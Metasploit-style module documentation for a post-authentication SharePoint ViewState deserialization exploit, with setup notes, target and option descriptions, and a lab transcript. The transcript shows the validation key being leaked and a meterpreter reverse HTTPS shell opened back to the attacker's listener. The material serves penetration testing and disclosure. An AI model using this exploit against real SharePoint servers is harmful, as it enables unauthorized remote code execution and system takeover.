## Vulnerable Application

### Description

The `EditingPageParser.VerifyControlOnSafeList` method fails to properly validate user supplied data. This can be
leveraged by an attacker to leak sensitive information in rendered-preview content. This module will leak the ViewState
validation key and then use it to sign a crafted object that will trigger code execution when deserialized.

The check method is unauthenticated and will determine whether or not the target service is vulnerable via the version
number. The exploit however requires authentication in order to trigger the vulnerability. See the documentation for the
[HttpUsername](#httpusername) option below for details on the account.

This vulnerability was patched in May of 2021.

Tested against SharePoint 2019 and SharePoint 2016, both on Windows Server 2016.

### Setup

Follow [Microsoft's
documentation](https://docs.microsoft.com/en-us/sharepoint/install/install-sharepoint-server-2016-on-one-server).

## Verification Steps

Follow [Setup](#setup) and [Scenarios](#scenarios).

## Targets

### Windows Command

This executes a Windows command.

### Windows Dropper

This uses a Windows dropper to execute code.

### PowerShell Stager

This uses a PowerShell stager to execute code.

## Options

### HttpUsername

Set this to the SharePoint username. This user must have the `SPBasePermissions.ManageLists` permission on the targeted
SharePoint site. By default, SharePoint users may create their own site where they will have this permissions however
this action **is not automatically performed** by this module.

### HttpPassword

Set this to the SharePoint password.

### VALIDATION_KEY

Set this to the ViewState validation key if you have it.

### COOKIE

Set this to a SharePoint cookie if you have one. This is primarily useful for form auth.

### SP_LIST

Set this to the title of any valid SPlist on the targeted SharePoint site. The `Documents` SPlist is typically a safe
option. The available SPlist items can be seen listed on the `/_layouts/15/viewlsts.aspx` page.

## Scenarios

### SharePoint 2019 on Windows Server 2016

```
msf exploit(windows/http/sharepoint_unsafe_control) > set RHOSTS 192.168.159.46
RHOSTS => 192.168.159.46
msf exploit(windows/http/sharepoint_unsafe_control) > set VHOST shrpnt2019
VHOST => shrpnt2019
msf exploit(windows/http/sharepoint_unsafe_control) > set HttpUsername aliddle
HttpUsername => aliddle
msf exploit(windows/http/sharepoint_unsafe_control) > set HttpPassword Password1
HttpPassword => Password1
msf exploit(windows/http/sharepoint_unsafe_control) > check
[*] 192.168.159.46:80 - The target appears to be vulnerable. SharePoint 16.0.0.10337 is a vulnerable build.
msf exploit(windows/http/sharepoint_unsafe_control) > exploit

[*] Started HTTPS reverse handler on https://192.168.159.128:8443
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable. SharePoint 16.0.0.10337 is a vulnerable build.
[*] Leaking the ViewState validation key...
[+] ViewState validation key: F894731BF335C2DAB04D70773B5F6BE55EE2C4052B671EE3C6785497A3D29A94
[*] Executing PowerShell Stager for windows/x64/meterpreter/reverse_https
[*] https://192.168.159.128:8443 handling request from 192.168.159.46; (UUID: a5re3jes) Staging x64 payload (201308 bytes) ...
[*] Meterpreter session 1 opened (192.168.159.128:8443 -> 127.0.0.1) at 2021-06-08 15:08:59 -0400

meterpreter > getuid
Server username: SHRPNT\SharePoint
meterpreter > sysinfo
Computer        : SHRPNT2019
OS              : Windows 2016+ (10.0 Build 14393).
Architecture    : x64
System Language : en_US
Domain          : SHRPNT
Logged On Users : 11
Meterpreter     : x64/windows
meterpreter > 
```
